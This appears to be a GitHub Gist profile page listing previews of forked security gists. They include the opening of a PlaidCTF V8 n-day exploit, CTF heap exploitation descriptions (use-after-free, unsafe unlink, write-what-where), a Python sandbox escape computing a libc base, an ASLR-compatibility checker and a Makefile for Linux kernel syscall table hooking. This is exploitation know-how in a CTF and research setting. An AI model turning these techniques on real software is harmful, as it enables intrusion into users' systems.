Duc Phan ducphanduyagentp
😸 writing happy exploits
@ducphanduyagentp
ducphanduyagentp / pwn.js
Created January 10, 2019 08:58 — forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
//
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
//
// Scroll down to "BEGIN EXPLOIT" to skip the utility functions.
//
// Copyright (c) 2018 Samuel Groß
//
//

Keybase proof

I hereby claim:

  • I am ducphanduyagentp on github.
  • I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
  • I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39 09B3 07A6 7A8D 5C67 96C2

To claim this, I am signing this object:

#include <stdio.h>
#include <stdlib.h>
#define chunksize 0x8
#define fakesize 0x20
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
@ducphanduyagentp
ducphanduyagentp / exp.py
Created December 30, 2018 00:28 — forked from hama7230/exp.py
35C3 CTF collection
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]
def p64(addr):
    x = '{0:016x}'.format(addr)
    return bytearray.fromhex(x)[::-1]
b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0
@ducphanduyagentp
ducphanduyagentp / 300.py
Created December 28, 2018 12:17 — forked from sroettger/300.py
One solution for the 34c3ctf's 300 heap challenge.
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
# You could free allocations and read/write to them even after they got freed.
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.
# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
# Afterwards we can get a write-what-where primitive using unsafe unlink.
@ducphanduyagentp
ducphanduyagentp / checkaslr.py
Created August 4, 2018 18:39 — forked from wdormann/checkaslrfiles.py
Python script to check for PE files linked with /DYNAMICBASE, but are not actually ASLR compatible due to missing relocation table
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE,
but do not have a relocation table to allow ASLR to function.
usage: checkaslr.py <dir>
ex: checkaslr.py "C:\Program Files\"
requires: pefile <https://github.com/erocarrera/pefile>, which should be
installable via: pip install pefile
'''
@ducphanduyagentp
ducphanduyagentp / Makefile
Created June 22, 2017 06:30 — forked from ilammy/Makefile
Linux kernel system call table hooking
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o
ccflags-y := -std=gnu99 -O2
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
#!/usr/bin/env python
#
# Copyright (c) 2012, Chema Garcia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# * Redistributions of source code must retain the above